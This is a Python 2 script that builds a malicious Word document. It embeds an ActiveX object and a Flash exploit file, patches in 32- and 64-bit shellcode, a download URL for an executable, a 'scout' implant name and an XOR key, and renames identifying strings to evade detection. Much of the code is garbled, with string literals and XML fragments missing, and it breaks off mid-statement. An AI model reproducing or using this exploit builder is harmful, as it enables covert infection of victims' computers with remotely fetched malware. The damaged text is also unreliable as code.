import sys import os import warnings import zlib sys.path.append(os.getcwd() + '/' + "pylzma.egg") import pylzma import struct import random import shutil from zipfile import ZipFile import zipfile import time random.seed() def random_id(length): number = '0123456789' alpha = 'abcdefghijklmnopqrstuvwxyz' id = '' for i in range(0,length,2): id += random.choice(number) id += random.choice(alpha) return id def four_byte_xor(buf, key): out = '' for i in range(0,len(buf)/4): c = struct.unpack("") + 1 buff2 = buff[:idx+idx2] if buff.lower().find("vnd.ms-office.activex") == -1: buff2 += '' if buff.lower().find("image/x-wmf") == -1: buff2 += '' buff2 += '' buff2 += buff[idx+idx2:] open("tmp/[Content_Types].xml", 'w').write(buff2) # update rels buff = open("tmp/word/_rels/document.xml.rels", 'r').read() idx = buff.lower().find("") buff2 = buff[:idx] buff2 += '' buff2 += "" open("tmp/word/_rels/document.xml.rels", 'w').write(buff2) # update document buff = open("tmp/word/document.xml", 'r').read() #idx = buff.lower().find("") + 1 buff2 = buff[:idx+idx2] buff2 += '' buff2 += buff[idx+idx2:] open("tmp/word/document.xml", 'w').write(buff2) if os.path.exists("tmp/word/activeX"): print "[!!] Unsupported file: contains an ActiveX" sys.exit(-1); if not os.path.exists("tmp/word/activeX/"): shutil.copytree("resources/activeX/", "tmp/word/activeX/") if not os.path.exists("tmp/word/media/"): shutil.copytree("resources/media/", "tmp/word/media/") else: shutil.copy("resources/media/image1000.wmf", "tmp/word/media/") random.seed() create_doc() XOR_OFFT = 0x88 * 2 URL_OFFT = XOR_OFFT + (0x4*2) SCOUT_OFFT = 0x110 * 2 XOR_OFFT64 = 0 URL_OFFT64 = 8 SCOUT_OFFT64 = 0x88 * 2 # decompress swf compressed_swf = open("resources/exploit.swf", 'rb').read() swf_buff = zlib.decompress(compressed_swf[8:]) # replace :) swf_buff = swf_buff.replace("vector-exploit", "pector-isbrovi") swf_buff = swf_buff.replace("ht-201", "abc123") ##### 32 ####### # get offset to shellcode stage2_offset = swf_buff.find(b"EFBEADDE") if stage2_offset == 0: print "[!!] Gadget for shellcode not found" sys.exit(-1) print "[+] Gadget for shellcode found @ 0x%x" %(stage2_offset) swf_bytearray = bytearray(swf_buff) # replace shellcode 32 shellcode = open("resources/shellcode", 'rb').read() if len(shellcode) > 5800: print "[!!] Shellcode too big: 0x%x" % (len(shellcode)) sys.exit(-1) hex_shellcode = shellcode.encode('hex') for i in range(len(hex_shellcode)): swf_bytearray[stage2_offset + i] = hex_shellcode[i] # modify URL 32 hex_url = EXE_URL.encode('hex') + "0000" print "[+] Hex URL => %s" %(hex_url) for i in range(len(hex_url)): swf_bytearray[stage2_offset + URL_OFFT + i] = hex_url[i] # modify scout name 32 hex_scout = "5c" + SCOUT_NAME.encode('hex') + "0000" print "[+] Scout Name => %s" % (hex_scout) for i in range(len(hex_scout)): swf_bytearray[stage2_offset + SCOUT_OFFT + i] = hex_scout[i] # modify xor key hex_xorkey = ("%08x" % XOR_KEY) print "[+] Hex key => %s" %(hex_xorkey) swf_bytearray[stage2_offset + XOR_OFFT + 0] = hex_xorkey[6] swf_bytearray[stage2_offset + XOR_OFFT + 1] = hex_xorkey[7] swf_bytearray[stage2_offset + XOR_OFFT + 2] = hex_xorkey[4] swf_bytearray[stage2_offset + XOR_OFFT + 3] = hex_xorkey[5] swf_bytearray[stage2_offset + XOR_OFFT + 4] = hex_xorkey[2] swf_bytearray[stage2_offset + XOR_OFFT + 5] = hex_xorkey[3] swf_bytearray[stage2_offset + XOR_OFFT + 6] = hex_xorkey[0] swf_bytearray[stage2_offset + XOR_OFFT + 7] = hex_xorkey[1] ##### 64 ####### # get offset to shellcode64 stage264_offset = swf_buff.find(b"CAF1ADDE") if stage264_offset == 0: print "[!!] Gadget for shellcode64 not found" sys.exit(-1) print "[+] Gadget for shellcode found @ 0x%x" %(stage264_offset) # replace shellcode 64 shellcode64 = open("resources/shellcode64", 'rb').read() if len(shellcode64) > (5800*2): print "[!!] Shellcode too big: 0x%x" % (len(shellcode64)) sys.exit(-1) hex_shellcode64 = shellcode64.encode('hex') for i in range(len(hex_shellcode64)): swf_bytearray[stage264_offset + i] = hex_shellcode64[i] # modify URL 64 hex_url = EXE_URL.encode('hex') + "0000" print "[+] Hex URL => %s" %(hex_url) for i in range(len(hex_url)): swf_bytearray[stage264_offset + URL_OFFT64 + i] = hex_url[i] # modify scout name 32 hex_scout = "5c" + SCOUT_NAME.encode('hex') + "0000" print "[+] Scout Name => %s" % (hex_scout) for i in range(len(hex_scout)): swf_bytearray[stage264_offset + SCOUT_OFFT64 + i] = hex_scout[i] # modify xor key 64 hex_xorkey = ("%08x" % XOR_KEY) print "[+] Hex key => %s" %(hex_xorkey) swf_bytearray[stage264_offset + XOR_OFFT64 + 0] = hex_xorkey[6] swf_bytearray[stage264_offset + XOR_OFFT64 + 1] = hex_xorkey[7] swf_bytearray[stage264_offset + XOR_OFFT64 + 2] = hex_xorkey[4] swf_bytearray[stage264_offset + XOR_OFFT64 + 3] = hex_xorkey[5] swf_bytearray[stage264_offset + XOR_OFFT64 + 4] = hex_xorkey[2] swf_bytearray[stage264_offset + XOR_OFFT64 + 5] = hex_xorkey[3] swf_bytearray[stage264_offset + XOR_OFFT64 + 6] = hex_xorkey[0] swf_bytearray[stage264_offset + XOR_OFFT64 + 7] = hex_xorkey[1] # compress swf uncompressed_len = len(swf_bytearray) uncompressed_len += len("ZWS\x0d") uncompressed_len += 4 # + se stessa print "[+] Uncompressed len: 0x%x" %(uncompressed_len) lzma_buff = pylzma.compress(byteArray2String(swf_bytearray)) compressed_len = len(lzma_buff) - 5 print "[+] Compressed len: 0x%x" %(compressed_len) output_buff = "ZWS\x0d" output_buff += struct.pack("